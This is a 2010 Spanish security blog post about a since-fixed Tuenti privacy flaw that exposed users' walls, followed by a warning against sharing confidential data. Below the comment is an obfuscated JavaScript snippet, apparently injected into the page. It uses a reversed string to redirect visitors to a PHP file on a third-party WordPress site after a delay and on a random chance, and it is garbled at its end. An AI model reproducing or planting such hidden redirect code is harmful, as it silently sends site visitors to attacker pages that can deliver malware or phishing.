Gran fallo de seguridad en Tuenti

Ya está solucionado, pero hasta hoy había un gran fallo de seguridad y privacidad en Tuentti: cualquier persona podía ver el tablón de cualquier usuario de la Red Social.

Hoy ha dejado de funcionar ya, pero en http://www.yatawaki.com/61058498 desde hace mucho tiempo se han podido ver y leer los tablones de cualquier persona de Tuenti fruto de este gran fallo de seguridad. Simplemente era necesario saber su identificador público de usuario.

El fallo se comunicó a Tuenti en repetidas ocasiones, y se ve que ya ha sido solucionado. Sorprendentemente yo, que he sido usuario de esa Red Social (y ahora sólo utilizo monomola porque es donde más seguridad y privacidad hay) y me he dado de baja hace mucho tiempo, me encontré con un aspecto sorprendente: mi tablón seguía ahí, accesible para todo el mundo, incluso después de mi baja.

De todas formas, es importante hacer mención al problema al que están sometidas todas las Redes Sociales: la repercusión de los fallos. Si bien es cierto que un fallo es un gran problema, cuando éste persiste durante mucho tiempo, las consecuencias son realmente terribles. Queda constancia que la privacidad que tanto dicen tener, realmente no existe, y fallos como este lo demuestran.

Estos errores generan consecuencias, que son un precio muy alto que debe pagar la Red Social. Pero, al final, como siempre, es el usuario quien tiene que pagarlo y someter sus datos a las ineptitudes de una aplicación por el hecho de que “la usa todo el mundo”. 
Fuente

Comentario:
Una vez mas nuestra recomendación de no poner datos confidenciales en las redes sociales, cualquiera que sea, para evitar “sorpresas” desagradables.

saludos

ms, 17-3-2010

.

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tot.gif”>

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies